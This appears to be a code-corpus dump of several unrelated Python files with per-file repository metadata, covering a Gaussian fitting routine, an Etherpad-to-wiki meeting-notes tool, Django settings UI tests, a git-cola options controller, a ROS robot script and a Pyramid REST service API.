'limited': [1,0], 'limits' : [np.min([0.0,bg0]),0.0],'value': bg, 'parname': 'bg0' },{ \
'limited': [0,0], 'limits' : [0.0,0.0], 'value' : 0.0, 'parname': 'bg1' },{ \
'limited': [1,0], 'limits' : [0.0,0.0], 'value' : amp1, 'parname': 'amp1' },{ \
'limited': [1,1], 'limits' : [pos1a,pos1b], 'value' : pos1, 'parname': 'pos1' },{ \
'limited': [1,1], 'limits' : [sig1_lo,sig1_hi], 'value' : sig1, 'parname': 'sig1' },{ \
'limited': [1,0], 'limits' : [0.0,0.0], 'value' : amp2, 'parname': 'amp2' },{ \
'limited': [1,1], 'limits' : [pos2a,pos2b], 'value' : pos2, 'parname': 'pos2' },{ \
'limited': [1,1], 'limits' : [sig2_lo,sig2_hi], 'value' : sig2, 'parname': 'sig2' }]
if chatter > 4:
print "parinfo has been set to: "
for par in parinfo: print par
Z = mpfit(fit2,p0,functkw=fa,parinfo=parinfo,quiet=True)
if (Z.status <= 0):
print 'uvotgetspec.runfit2.mpfit error message = ', Z.errmsg
print "parinfo has been set to: "
for par in parinfo: print par
elif (chatter > 3):
print "\nparameters and errors : "
for i in range(8): print "%10.3e +/- %10.3e\n"%(Z.params[i],Z.perror[i])
return Z
def fit2(p, fjac=None, x=None, y=None, err=None):
    """mpfit residual function: linear background plus two gaussians.

    p holds (bg0, bg1, amp1, pos1, sig1, amp2, pos2, sig2); fjac is
    unused (mpfit computes derivatives numerically).  Returns the
    mpfit-style pair [status, weighted residuals].
    """
    import numpy as np
    bg0, bg1, amp1, pos1, sig1, amp2, pos2, sig2 = p
    gauss1 = amp1 * np.exp(-((x - pos1) / sig1) ** 2)
    gauss2 = amp2 * np.exp(-((x - pos2) / sig2) ** 2)
    model = bg0 + bg1 * x + gauss1 + gauss2
    return [0, (y - model) / err]
|
ISO-8859-1
|
Python
| false | false | 2,014 |
10,453,950,443,835 |
415bca727cd145c8c57c9a78014f012ff1901e78
|
eeb34a5d5b6564f88116a58cc35f4cc524edc949
|
/wikimtgs/__init__.py
|
12c54297340f0d633abbf3c704b9b31a7e93f7cb
|
[] |
no_license
|
kmaglione/wikimtgs
|
https://github.com/kmaglione/wikimtgs
|
99a2e6907655dd4ff868f3b15156accfcd959d76
|
5e90868efef6e8925a85e47dd3fc7cf64d625e08
|
refs/heads/master
| 2020-04-26T16:03:27.206924 | 2014-03-19T18:16:06 | 2014-03-19T18:16:06 | 17,762,919 | 2 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
import re
import subprocess
import mwclient
import requests
class WikiMtgs(object):
    """Manage per-meeting Etherpad pads and their wiki archive.

    The index wiki page lists upcoming meeting pads, one bullet per
    etherpad URL inserted after the INDEX_START marker.  `create` makes
    the pad for a date and lists it; `archive` converts the pad content
    to mediawiki markup (via pandoc) and moves it to a dated sub-page
    of the index, replacing the pad link with a wiki link.
    """

    SITE = {
        'host': ('https', 'wiki.mozilla.org'),
        'path': '/',
    }
    # marker line in the index page after which new pad links are inserted
    INDEX_START = 'NEW_MEETING_MINUTES_ENTRIES'

    ETHERPAD_SITE = 'https://%(subpad)setherpad.mozilla.org'
    ETHERPAD_CREATE = ETHERPAD_SITE + '/ep/pad/create'

    @property
    def etherpad_export(self):
        # HTML export URL for the pad's latest revision
        return '%s/ep/pad/export/%s/latest?format=html' % (self.ETHERPAD_SITE,
                                                           self.etherpad_page)

    @property
    def etherpad_template(self):
        return '%s/%s' % (self.ETHERPAD_SITE, self.etherpad_page)

    @property
    def archive_template(self):
        return self.index_page + '/%(date)s'

    def __init__(self, login, index_page, etherpad_page, etherpad_team=''):
        self.etherpad_page = etherpad_page
        self.index_page = index_page
        self.login = login
        self.subpad = etherpad_team

    def params(self, date=None):
        """Substitution dict for the URL and page-name templates."""
        return {
            'date': date,
            'subpad': '%s.' % self.subpad if self.subpad else ''
        }

    def connect(self):
        """Return a logged-in mwclient Site."""
        site = mwclient.Site(**self.SITE)
        site.login(*self.login)
        return site

    def archive(self, date):
        """Copy the pad for `date` to the wiki and link it from the index."""
        site = self.connect()
        params = self.params(date=date)

        etherpad = self.etherpad_template % params
        export = self.etherpad_export % params
        archive = self.archive_template % params

        # pandoc converts the pad's HTML export into mediawiki markup
        text = call('pandoc', '-fhtml', '-tmediawiki',
                    input=requests.get(export).text.encode('utf-8'))

        site.pages[archive].save(
            summary='Archiving meeting notes from %s to wiki' % etherpad,
            text=text)

        # replace the raw pad URL in the index with a wiki link to the
        # archive page (was site.Pages; use the one spelling consistently)
        page = site.pages[self.index_page]
        page.save(summary='Archive notes for %s' % date,
                  text=page.edit().replace(etherpad,
                                           '[[%s]]' % archive))

    def create(self, date):
        """Create the pad for `date` and add it to the index page."""
        site = self.connect()
        params = self.params(date=date)

        etherpad = self.etherpad_template % params
        create = self.ETHERPAD_CREATE % params

        if False:
            # Grr. Etherpad. This does not work as expected. I
            # suspect it's because `requests` attempts to use
            # HTTP/1.1
            requests.post(create,
                          data=dict(padId=date))
        else:
            call('curl', '-LsdpadId=%s' % date, create)

        # insert the new pad bullet right after the INDEX_START marker line
        page = site.pages[self.index_page]   # was site.Pages
        text = re.sub(self.INDEX_START + r'.*\n',
                      lambda r: r.group(0) + '* %s\n' % etherpad,
                      page.edit())
        page.save(summary='Adding notes pad for %s' % date,
                  text=text)
def call(*args, **kwargs):
    """Run *args as an external command.

    By default the command's stdout is captured (text mode) and returned
    with the trailing newline stripped; stderr is captured but discarded.
    With background=True the process is started detached from our stdio
    and the function returns None without waiting for it.

    Keyword arguments:
      input      -- text fed to the child's stdin (foreground mode only)
      background -- launch without waiting for completion
    All remaining keyword arguments are passed through to subprocess.Popen.
    """
    import os
    import signal
    background = kwargs.pop('background', False)
    input_data = kwargs.pop('input', None)   # don't shadow the builtin `input`
    if background:
        stdin = open(os.devnull, 'r')
        pipe = None
    else:
        stdin = subprocess.PIPE
        pipe = subprocess.PIPE
    try:
        p = subprocess.Popen(args, stdin=stdin, stdout=pipe, stderr=pipe,
            # restore default SIGPIPE handling so shell-like tools behave
            preexec_fn=lambda: signal.signal(signal.SIGPIPE, signal.SIG_DFL),
            cwd=os.environ['HOME'], close_fds=True,
            # text mode: keeps py2 behavior and makes rstrip('\n') valid on py3
            universal_newlines=True, **kwargs)
    finally:
        if background:
            stdin.close()   # the child holds its own copy; don't leak ours
    if not background:
        return p.communicate(input_data)[0].rstrip('\n')
|
UTF-8
|
Python
| false | false | 2,014 |
9,680,856,329,908 |
805a1f9980cd60dd0c5a609daa2f9de0dd394788
|
5da610dbe48cfba9313aac0796b1f5afa859020e
|
/testproject-django/testapp/tests/test_ui.py
|
f58e956c374fbcb79cc2be9dd0ab83ee586c4c44
|
[
"BSD-3-Clause"
] |
permissive
|
playpauseandstop/setman
|
https://github.com/playpauseandstop/setman
|
cabb9dad3e449956b8a1ab1adb7f6cde9e0b156f
|
08fc786b0d7ad0216129c62e4907d6aa79643739
|
refs/heads/master
| 2020-04-01T19:44:39.438386 | 2012-01-27T16:54:20 | 2012-01-27T16:54:20 | 3,001,810 | 2 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
import copy
from decimal import Decimal
from django.conf import settings as django_settings
from django.contrib.auth.models import User
from django.core.urlresolvers import reverse
from django.test import TestCase as DjangoTestCase
from setman import get_version, settings
from setman.frameworks.django_setman.models import Settings
from setman.utils.parsing import is_settings_container
from testapp.forms import SandboxForm
from testapp.tests.test_models import TEST_SETTINGS
__all__ = ('TestAdminUI', 'TestAdminUIForbidden', 'TestUI', 'TestUIForbidden')

# A full, *valid* replacement value for every configurable setting;
# posted by the edit tests and expected to pass validation.  The nested
# 'testapp' dict holds the app-local settings.
NEW_SETTINGS = {
    'BOOLEAN_SETTING': True,
    'CHOICE_SETTING': 'waterlemon',
    'CHOICE_SETTING_WITH_LABELS': 'waterlemon',
    'CHOICE_SETTING_WITH_GROUPS': 'Kate',
    'CHOICE_SETTING_WITH_LABELS_AND_GROUPS': 'grape',
    'CHOICE_SETTING_WITH_INTERNAL_CHOICES': 'editor',
    'CHOICE_SETTING_WITH_INTERNAL_MODEL_CHOICES': 'senior_editor',
    'DECIMAL_SETTING': Decimal('5.33'),
    'INT_SETTING': 20,
    'IP_SETTING': '192.168.1.2',
    'FLOAT_SETTING': 189.2,
    'STRING_SETTING': 'setting',
    'testapp': {
        'app_setting': 'someone',
        'setting_to_redefine': 24,
    },
    'VALIDATOR_SETTING': 'abc xyz',
}
# Username (also used as password and mailbox prefix) the tests log in as.
TEST_USERNAME = 'username'
# For each setting, a tuple of values that must be *rejected* by
# validation (wrong choice, out of range, bad format, ...).
WRONG_SETTINGS = {
    'CHOICE_SETTING': ('pepper', ),
    'CHOICE_SETTING_WITH_LABELS': ('pepper', ),
    'CHOICE_SETTING_WITH_GROUPS': ('Michael', ),
    'CHOICE_SETTING_WITH_LABELS_AND_GROUPS': ('pepper', ),
    'CHOICE_SETTING_WITH_INTERNAL_CHOICES': ('admin', ),
    'CHOICE_SETTING_WITH_INTERNAL_MODEL_CHOICES': ('admin', ),
    'DECIMAL_SETTING': (Decimal(-1), Decimal(12), Decimal('8.3451')),
    'INT_SETTING': (12, 48),
    'IP_SETTING': ('127.0.0', ),
    'FLOAT_SETTING': ('', ),
    'STRING_SETTING': ('Not started from s', ),
    'testapp': {
        'app_setting': ('something', ),
        'setting_to_redefine': (72, ),
    },
    'VALIDATOR_SETTING': ('abc', 'xyz', 'Something'),
}
class TestCase(DjangoTestCase):
    """Shared scaffolding for the UI tests.

    Forces the stock Django ModelBackend (so self.login() works without
    the project's usual auth backend), resolves the URLs used by the
    tests, and provides recursive helpers for checking settings
    containers and for flattening nested POST data.
    """

    def setUp(self):
        # swap in ModelBackend for the duration of the test; restored in
        # tearDown so other test cases see the original configuration
        self.old_AUTHENTICATION_BACKENDS = \
            django_settings.AUTHENTICATION_BACKENDS
        django_settings.AUTHENTICATION_BACKENDS = (
            'django.contrib.auth.backends.ModelBackend',
        )
        # commonly used URLs, resolved once per test
        self.docs_url = reverse('docs')
        self.edit_settings_url = reverse('setman_edit')
        self.home_url = reverse('home')
        self.revert_settings_url = reverse('setman_revert')
        self.sandbox_url = reverse('sandbox')
        self.view_settings_url = reverse('view_settings')

    def tearDown(self):
        # undo the backend override from setUp
        django_settings.AUTHENTICATION_BACKENDS = \
            self.old_AUTHENTICATION_BACKENDS

    def check_labels(self, response, available_settings=None):
        """Assert that the label and help text of every setting (and,
        recursively, of every nested settings container) appear in the
        response."""
        available_settings = available_settings or settings.available_settings
        for setting in available_settings:
            if is_settings_container(setting):
                self.check_labels(response, setting)
            else:
                self.assertContains(response, setting.label)
                self.assertContains(response, setting.help_text)

    def check_values(self, settings, data):
        """Assert that every (possibly nested) value in `data` matches
        the corresponding attribute on the settings object."""
        for name, value in data.items():
            mixed = getattr(settings, name)
            if is_settings_container(mixed):
                self.check_values(mixed, data.get(name))
            else:
                self.assertEqual(mixed, value)

    def login(self, username, is_admin=False):
        """Get or create a user (password == username) and return a
        logged-in test client; optionally promote to staff/superuser."""
        try:
            user = User.objects.get(username=username)
        except User.DoesNotExist:
            user = User.objects.create_user(username=username,
                                            password=username,
                                            email=username + '@domain.com')
        else:
            # existing user: make sure the password matches the convention
            user.set_password(username)
            user.save()
        if is_admin:
            user.is_staff = True
            user.is_superuser = True
            user.save()
        client = self.client
        client.login(username=username, password=username)
        return client

    def to_post_data(self, data, prefix=None):
        """Flatten a nested settings dict into POST data, joining nested
        keys with dots (e.g. {'testapp': {'a': 1}} -> {'testapp.a': 1})."""
        data = copy.deepcopy(data)
        post_data = {}
        for key, value in data.items():
            if isinstance(value, dict):
                post_data.update(self.to_post_data(value, key))
            else:
                if prefix:
                    key = '.'.join((prefix, key))
                post_data.update({key: value})
        return post_data
class TestAdminUI(TestCase):
    """Django admin integration: the setman app is listed for admins
    and its change view saves settings."""

    def setUp(self):
        super(TestAdminUI, self).setUp()
        self.add_url = reverse('admin:django_setman_settings_add')
        self.admin_url = reverse('admin:index')
        self.edit_url = reverse('admin:django_setman_settings_changelist')

    def test_admin(self):
        """Anonymous users see no setman entry; an admin sees the Change
        link but no Add link (settings are a singleton)."""
        # admin index pages link relative to the admin root
        relative = lambda url: url.replace(self.admin_url, '')
        response = self.client.get(self.admin_url)
        self.assertNotContains(response, 'Settings Manager')
        self.assertNotContains(response, 'Settings</a>')

        client = self.login(TEST_USERNAME, is_admin=True)
        response = client.get(self.admin_url)
        self.assertContains(response, 'Settings Manager')
        self.assertContains(
            response, '<a href="%s">Settings</a>' % relative(self.edit_url)
        )
        self.assertNotContains(
            response, '<a href="%s" class="addlink">Add</a>' % \
            relative(self.add_url)
        )
        self.assertContains(
            response,
            '<a href="%s" class="changelink">Change</a>' % \
            relative(self.edit_url)
        )

    def test_admin_edit(self):
        """The admin change view shows every setting's label and saves
        a full set of new values."""
        client = self.login(TEST_USERNAME, is_admin=True)
        response = client.get(self.edit_url)
        self.check_labels(response)

        response = client.post(self.edit_url, self.to_post_data(NEW_SETTINGS))
        # successful save redirects back to the change list
        self.assertEqual(response.status_code, 302)
        self.assertIn(self.edit_url, response['Location'])
        self.check_values(settings, NEW_SETTINGS)
class TestAdminUIForbidden(TestCase):
    """When the auth-permitted hook denies everyone, the setman app
    disappears from the admin index even for superusers."""

    def setUp(self):
        super(TestAdminUIForbidden, self).setUp()
        self.admin_url = reverse('admin:index')
        # deny access for everybody; restored in tearDown
        self.old_auth_permitted_func = settings._framework.auth_permitted_func
        settings._framework.auth_permitted_func = lambda request: False

    def tearDown(self):
        settings._framework.auth_permitted_func = self.old_auth_permitted_func

    def test_admin(self):
        """Even an admin user must not see the setman entries."""
        client = self.login(TEST_USERNAME, is_admin=True)
        response = client.get(self.admin_url)
        self.assertNotContains(response, 'Settings Manager')
        self.assertNotContains(response, 'Settings</a>')
class TestUI(TestCase):
    """End-to-end tests of the non-admin UI: docs, settings edit/revert,
    home page links, the sandbox view and the settings-files view."""

    def test_docs(self):
        """The docs URL serves the project documentation (two possible
        layouts depending on how the docs were built)."""
        client = self.login(TEST_USERNAME)
        response = client.get(self.docs_url, follow=True)
        try:
            self.assertContains(response, 'Documentation', count=2)
        except AssertionError:
            # Sphinx-style build uses a versioned title instead
            self.assertContains(
                response,
                'django-setman %s documentation' % get_version(),
                count=4
            )

    def test_edit_settings(self):
        """Posting a full set of valid values saves them and redirects
        back to the edit page."""
        client = self.login(TEST_USERNAME)
        response = client.get(self.edit_settings_url)
        self.assertContains(response, 'Edit Settings', count=2)
        self.check_labels(response)

        data = self.to_post_data(NEW_SETTINGS)
        response = client.post(self.edit_settings_url, data)
        self.assertEqual(response.status_code, 302)
        self.assertIn(self.edit_settings_url, response['Location'])

        # drop the cached values so the next reads hit the backend
        settings._backend.clear()
        self.check_values(settings, NEW_SETTINGS)

    def test_edit_settings_errors(self):
        """Every wrong value must produce a validation error and leave
        the stored setting unchanged."""
        client = self.login(TEST_USERNAME)

        for key, values in WRONG_SETTINGS.items():
            old_value = getattr(settings, key)

            for value in values:
                data = copy.deepcopy(TEST_SETTINGS)
                data.update({key: value})

                response = client.post(self.edit_settings_url, data)
                self.assertContains(
                    response,
                    'Settings cannot be saved cause of validation issues. ' \
                    'Check for errors below.'
                )
                self.assertContains(response, '<dd class="errors">')

                settings._backend.clear()

                if is_settings_container(old_value):
                    # containers compare by prefix, not by value
                    new_value = getattr(settings, key)
                    self.assertTrue(is_settings_container(new_value))
                    self.assertEqual(old_value._prefix, new_value._prefix)
                else:
                    self.assertEqual(getattr(settings, key), old_value)

    def test_edit_settings_not_duplicated_validation(self):
        """A failing validator must report its error exactly once."""
        client = self.login(TEST_USERNAME)
        data = copy.deepcopy(TEST_SETTINGS)
        data.update({'INT_SETTING': 128})

        response = client.post(self.edit_settings_url, data)
        self.assertContains(
            response, 'Ensure this value is less than or equal to 32.',
            count=1
        )

    def test_home(self):
        """The home page links to edit, sandbox and view-settings."""
        client = self.login(TEST_USERNAME)
        response = client.get(self.home_url)
        self.assertContains(
            response,
            '<li><a href="%s">Edit test project settings</a></li>' % \
            self.edit_settings_url
        )
        self.assertContains(
            response,
            '<li><a href="%s">Sandbox</a></li>' % self.sandbox_url
        )
        self.assertContains(
            response,
            '<li><a href="%s">View configuration definition and default ' \
            'values files</a></li>' % self.view_settings_url
        )

    def test_home_not_authenticated(self):
        """Anonymous visitors are invited to log in via oDesk."""
        response = self.client.get(self.home_url, follow=True)
        self.assertContains(
            response,
            'Log in with oDesk account <a href="%s?next=/">here</a>.' % \
            reverse('django_odesk.auth.views.authenticate')
        )

    def test_revert_settings(self):
        """The revert URL restores the defaults and redirects to edit."""
        Settings.objects.create(data=NEW_SETTINGS)
        client = self.login(TEST_USERNAME)
        response = client.get(self.revert_settings_url)
        self.assertEquals(response.status_code, 302)
        self.assertIn(self.edit_settings_url, response['Location'])
        self.check_values(settings, TEST_SETTINGS)

    def test_sandbox(self):
        """The sandbox shows the value of a requested setting name."""
        client = self.login(TEST_USERNAME)
        response = client.get(self.sandbox_url)
        self.assertContains(response, 'Sandbox', count=2)
        self.assertContains(response, 'Name:</label></dt>')
        # no value section until a name has been posted
        self.assertNotContains(response, '<dt>Value:</dt>')

        response = client.post(self.sandbox_url, data={'name': 'DEBUG'})
        self.assertContains(response, '<dt>Value:</dt>')
        self.assertContains(response, '%s' % django_settings.DEBUG)

        response = client.post(self.sandbox_url, data={'name': 'IP_SETTING'})
        self.assertContains(response, '<dt>Value:</dt>')
        self.assertContains(response, settings.IP_SETTING)

    def test_sandbox_errors(self):
        """Forbidden settings must never be displayed by the sandbox."""
        client = self.login(TEST_USERNAME)

        for name in SandboxForm.FORBIDDEN_SETTINGS:
            response = client.post(self.sandbox_url, {'name': name})
            self.assertContains(
                response, 'The value for this setting is forbidden.'
            )
            self.assertNotContains(response, '<dt>Value:</dt>')

            if getattr(django_settings, name):
                self.assertNotContains(
                    response, '%s' % getattr(django_settings, name)
                )

    def test_view_settings(self):
        """The view-settings page lists the configuration definition and
        default values files for the project and each app."""
        client = self.login(TEST_USERNAME)
        response = client.get(self.view_settings_url)
        self.assertContains(
            response, 'Configuration Definition and Default Values Files',
            count=2
        )
        self.assertContains(
            response, 'Configuration Definition File', count=2
        )
        self.assertContains(
            response, 'Project Configuration Definition File', count=1
        )
        self.assertContains(
            response, 'Apps Configuration Definition Files', count=1
        )
        self.assertContains(response, 'App: testapp', count=1)
        self.assertContains(response, 'Default Values File', count=3)
class TestUIForbidden(TestCase):
    """With the auth hook limited to superusers, ordinary users get 403
    from the edit and revert views."""

    def setUp(self):
        super(TestUIForbidden, self).setUp()
        # only superusers may pass; restored in tearDown
        self.old_auth_permitted_func = settings._framework.auth_permitted_func
        settings._framework.auth_permitted_func = \
            lambda request: request.user.is_superuser

    def tearDown(self):
        settings._framework.auth_permitted_func = self.old_auth_permitted_func

    def test_edit_settings_forbidden(self):
        """A non-superuser may not open the edit view."""
        client = self.login(TEST_USERNAME)
        response = client.get(self.edit_settings_url)
        self.assertContains(response, 'Access Forbidden', status_code=403)

    def test_revert_settings_forbidden(self):
        """A non-superuser may not revert the settings."""
        client = self.login(TEST_USERNAME)
        response = client.get(self.revert_settings_url)
        self.assertContains(response, 'Access Forbidden', status_code=403)
|
UTF-8
|
Python
| false | false | 2,012 |
4,750,233,835,028 |
4cc0d712f11f98c3981d804ca6aedc23ff95fca2
|
d951044b543c7bc727de6aa741c5250385bad2bd
|
/cola/controllers/options.py
|
f767bed19c1228826d2807193e98dfb622506b84
|
[
"GPL-2.0-or-later",
"GPL-2.0-only"
] |
non_permissive
|
kbielefe/git-cola
|
https://github.com/kbielefe/git-cola
|
47a1b10eeac28bf011f48bdccdf09d0c325dd161
|
3a459d32e31fbdbf779353abbb967eb0796ecce8
|
refs/heads/master
| 2021-01-17T22:10:14.014409 | 2011-08-09T22:58:14 | 2011-08-09T22:58:14 | 2,217,654 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
"""This module provides the controller for the options gui
"""
from PyQt4 import QtGui
from PyQt4.QtCore import SIGNAL
import cola
from cola import qtutils
from cola import serializer
from cola.views import option
from cola.qobserver import QObserver
def update_options():
    """Launch the options window given a model and parent widget.

    Returns True when the dialog was accepted (settings saved),
    False when it was cancelled.
    """
    parent = QtGui.QApplication.instance().activeWindow()
    view = option.OptionsView(parent)
    # the controller must stay referenced while the dialog runs; exec_()
    # blocks below, so this local binding is enough to keep it alive
    ctl = OptionsController(view)
    view.show()
    return view.exec_() == QtGui.QDialog.Accepted
class OptionsController(QObserver):
    """Provides control to the options dialog.

    Works on a clone of the main model so edits can be freely made in
    the dialog; on save the changed parameters are written to git config
    and copied into the main model, on cancel they are restored from a
    second (backup) clone.
    """
    def __init__(self, view):
        ## operate on a clone of the original model
        QObserver.__init__(self, serializer.clone(cola.model()), view)
        ## used to restore original values when cancelling
        self._backup_model = serializer.clone(cola.model())
        ## config params modified by the gui
        self.add_observables('local_user_email',
                             'local_user_name',
                             'local_merge_summary',
                             'local_merge_diffstat',
                             'local_merge_verbosity',
                             'local_gui_diffcontext',
                             'global_user_email',
                             'global_user_name',
                             'global_merge_keepbackup',
                             'global_merge_summary',
                             'global_merge_diffstat',
                             'global_merge_verbosity',
                             'global_gui_editor',
                             'global_merge_tool',
                             'global_diff_tool',
                             'global_gui_diffcontext',
                             'global_gui_historybrowser',
                             'global_cola_fontdiff_size',
                             'global_cola_fontdiff',
                             'global_cola_savewindowsettings',
                             'global_cola_tabwidth')
        # Refresh before registering callbacks to avoid extra notifications
        self.refresh_view()
        # Register actions: font/tab changes propagate live to the main
        # model so their effect is visible immediately
        self.add_actions(global_cola_fontdiff = self.tell_parent_model)
        self.add_callbacks(global_cola_fontdiff_size = self.update_size)
        self.add_actions(global_cola_tabwidth = self.tell_parent_model)
        self.add_callbacks(save_button = self.save_settings)
        # cancelling the dialog must undo any live-propagated changes
        self.connect(self.view, SIGNAL('rejected()'), self.restore_settings)

    def refresh_view(self):
        """Apply the configured font and update widgets."""
        # The fixed-width console font
        qtutils.set_diff_font(self.view.global_cola_fontdiff)
        # Label the group box around the local repository
        self.view.local_groupbox.setTitle(unicode(self.tr('%s Repository'))
                                          % self.model.project)
        QObserver.refresh_view(self)

    def save_settings(self):
        """Save updated config variables back to git."""
        # only write parameters that actually differ from the backup
        params_to_save = []
        params = self.model.config_params()
        for param in params:
            value = self.model.param(param)
            backup = self._backup_model.param(param)
            if value != backup:
                params_to_save.append(param)
        for param in params_to_save:
            self.model.save_config_param(param)
        # Update the main model with any changed parameters
        cola.model().copy_params(self.model, params_to_save)
        self.view.done(QtGui.QDialog.Accepted)

    def restore_settings(self):
        """Reverts any changes done in the Options dialog."""
        # font size is propagated live, so it must be restored explicitly
        params = (self._backup_model.config_params() +
                  ['global_cola_fontdiff_size'])
        self.model.copy_params(self._backup_model, params)
        self.tell_parent_model()

    def tell_parent_model(self,*rest):
        """Notifies the main app's model about changed parameters"""
        params= ('global_cola_fontdiff',
                 'global_cola_fontdiff_size',
                 'global_cola_savewindowsettings',
                 'global_cola_tabwidth')
        for param in params:
            cola.model().set_param(param, self.model.param(param))

    def update_size(self, *rest):
        """Updates fonts whenever font sizes change"""
        # The fixed-width console font combobox
        font = str(self.view.global_cola_fontdiff.currentFont().toString())
        default = self.model.global_cola_fontdiff or font
        self.model.apply_diff_font_size(default)
        self.tell_parent_model()
|
UTF-8
|
Python
| false | false | 2,011 |
8,169,027,805,871 |
353b4a50f902861ab1f96067cacbee6806e2184f
|
befd042aa00c92c7d53ea8fed4784ba0aa3884ac
|
/robot0.py
|
1ccf3379f1348b4bcdd09949a441e5554d276ffb
|
[] |
no_license
|
ThisNameNotUsed/atMudd
|
https://github.com/ThisNameNotUsed/atMudd
|
4326490014f1ea556bac36476c6f7af0d6e7ac8d
|
2b96b6cb5402938f7172ed86dfbe469438dc10e5
|
refs/heads/master
| 2020-04-15T05:38:54.391315 | 2014-06-04T17:51:28 | 2014-06-04T17:51:28 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
#!/usr/bin/env python
import roslib; roslib.load_manifest('irobot_mudd')
import rospy
import irobot_mudd
from std_msgs.msg import String
from irobot_mudd.srv import *
from irobot_mudd.msg import *
import time
import math
####
# robot0.py ~ starter file for scripting the Create with ROS
####
####
# D is our global system state
####
class Data: pass # empty class for a generic data holder
D = Data() # an object to hold our system's services and state
# Topic name for incoming text commands.
# NOTE(review): the subscriber in init() uses the literal 'text_data'
# rather than this constant -- presumably they should stay in sync.
stream_name = 'text_data'
####
# main and init
####
def main():
    """ the main program that gives our node a name,
        sets up service objects, subscribes to topics (with a callback),
        and then lets interactions happen!
    """
    global D
    # set up services and subscribe to data streams
    init()
    # BUG FIX: the keyboard-handling code that used to sit here referenced
    # the undefined name "message", raising a NameError as soon as main()
    # ran.  Incoming messages are delivered to callback(), so main() only
    # needs to keep the node alive and wait for shutdown.
    rospy.spin()
def init():
    """Initialize the ROS node, subscribe to the text stream, and obtain
    service proxies for driving (tank), singing (song), and LEDs.
    """
    global D # to hold system state
    # BUG FIX: the node must be initialized before any other ROS
    # interaction; the original code created the Subscriber first.
    rospy.init_node('lab1_node', anonymous=True)
    # listen for incoming text commands
    rospy.Subscriber( 'text_data', String, callback )
    # we obtain the tank service
    rospy.wait_for_service('tank') # wait until the motors are available
    D.tank = rospy.ServiceProxy('tank', Tank) # D.tank is our "driver"
    # we obtain the song service
    rospy.wait_for_service('song') # wait until our voice is available
    D.song = rospy.ServiceProxy('song', Song) # D.song is our "speaker"
    # blinky blinky
    rospy.wait_for_service('leds')
    D.leds = rospy.ServiceProxy('leds', Leds)
####
# callback ~ called with each published message
####
def callback(data):
""" This function is called for each published message
"""
message = data.data
print "I received the string", message
# if the message is the string 'q', we shutdown
if message == 'q':
rospy.signal_shutdown("Quit requested.")
####
# It all starts here...
#
# This is the "main" trick: it tells Python what code to run
# when you execute this file as a stand-alone script:
####
# Standard entry-point guard: run main() only when this file is executed
# directly, not when it is imported.
if __name__ == "__main__":
    main()
|
UTF-8
|
Python
| false | false | 2,014 |
17,772,574,679,366 |
29858d92b68810668f130938b8ac505afb818197
|
78cb29d6d1f09f8e6ef4e964d5557b3f3b5ec8ad
|
/restapi/views/csh_services.py
|
714c6e1544e077797e5b08b8a6a7012a1459a910
|
[] |
no_license
|
snoozan/onebarAPI
|
https://github.com/snoozan/onebarAPI
|
d3bfc984f350f45dfc35615aa1a052547eea677d
|
338c5c83bc23900e6fe08b4dc1876ab9d9dbb316
|
refs/heads/master
| 2021-01-14T08:50:19.584689 | 2014-04-03T01:03:33 | 2014-04-03T01:03:33 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
from restapi.validators import JSON, ValidFields
from restapi.services import cshServices, allcshServices
from restapi.models import DBSession, CSH_Services
from sqlalchemy import desc
from pyramid.httpexceptions import HTTPForbidden
import json
@cshServices.get(renderer='json')
def getServiceByID(request):
    """Return one CSH service looked up by its integer ``id``.

    <-
    {
        'id': <>
        'icon': <>
        'name': <>
        'url': <>
    }

    Returns HTTPForbidden when no service matches (kept for backward
    compatibility, although 404 would be more conventional).
    """
    # Filter in the database instead of scanning every row in Python.
    service_id = int(request.GET['id'])
    service = (DBSession.query(CSH_Services)
               .filter(CSH_Services.id == service_id)
               .first())
    if service is None:
        return HTTPForbidden()
    return {
        'id': service.id,
        'icon': service.icon,
        'name': service.name,
        'url': service.url
    }
@allcshServices.get(renderer='json')
def getServices(request):
    """Return every CSH service, ordered by id.

    <-
    {
        all service objects
        {
            'id': <>
            'icon': <>
            'name': <>
            'url': <>
        }
    }
    """
    # One wrapper dict per service row.
    return [
        {
            'id': svc.id,
            'icon': svc.icon,
            'name': svc.name,
            'url': svc.url,
        }
        for svc in DBSession.query(CSH_Services).order_by(CSH_Services.id)
    ]
@cshServices.delete(renderer = 'json')
def deleteService(request):
    """Delete every service whose name matches request.GET['name'].

    Always reports success, even when nothing matched (same contract as
    the original implementation).
    """
    name = request.GET['name']
    # Let the database find the matching rows instead of scanning the
    # full table and deleting while iterating it.
    for service in DBSession.query(CSH_Services).filter(CSH_Services.name == name):
        DBSession.delete(service)
    return {
        'success': True
    }
@cshServices.post(validators=[JSON, ValidFields('name','icon','url')])
def addService(request):
    """Create a new service with the next available id.

    ->
    {
        'name'
        'icon'
        'url'
    }
    <-
    {
        'success': True
        'id': <>
        'icon': <>
        'name': <>
        'url': <>
    }
    """
    # One query instead of two: first() returns None on an empty table.
    # NOTE(review): this read-then-insert id allocation is race-prone
    # under concurrent requests; an autoincrement column would be safer.
    last = DBSession.query(CSH_Services).order_by(desc(CSH_Services.id)).first()
    service_id = 0 if last is None else last.id + 1
    new_service = CSH_Services(
        id = service_id,
        icon = request.json_body['icon'],
        name = request.json_body['name'],
        url = request.json_body['url']
    )
    DBSession.add(new_service)
    return {
        'success': True,
        'id': new_service.id,
        'icon': new_service.icon,
        'name': new_service.name,
        'url': new_service.url
    }
|
UTF-8
|
Python
| false | false | 2,014 |
13,262,859,015,616 |
41d3621d8bdc26484c7a2fb9dcf1afb66ee9b95a
|
8922f3b28329b32d5438cc13b903f742322f9301
|
/webapps/server/views.py
|
a596fc53280657db96311c7e7e32624b1d89a93e
|
[
"Apache-2.0"
] |
permissive
|
glowe/mongo-web-shell
|
https://github.com/glowe/mongo-web-shell
|
f82a901ad2ca93d4badb4461b62d85f8b6f54618
|
ffe2646116b8ef323892dac2cfee41ccb3aaa3b2
|
refs/heads/master
| 2016-11-03T03:34:50.002664 | 2014-05-19T19:37:22 | 2014-05-19T19:37:22 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# Copyright 2013 10gen Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
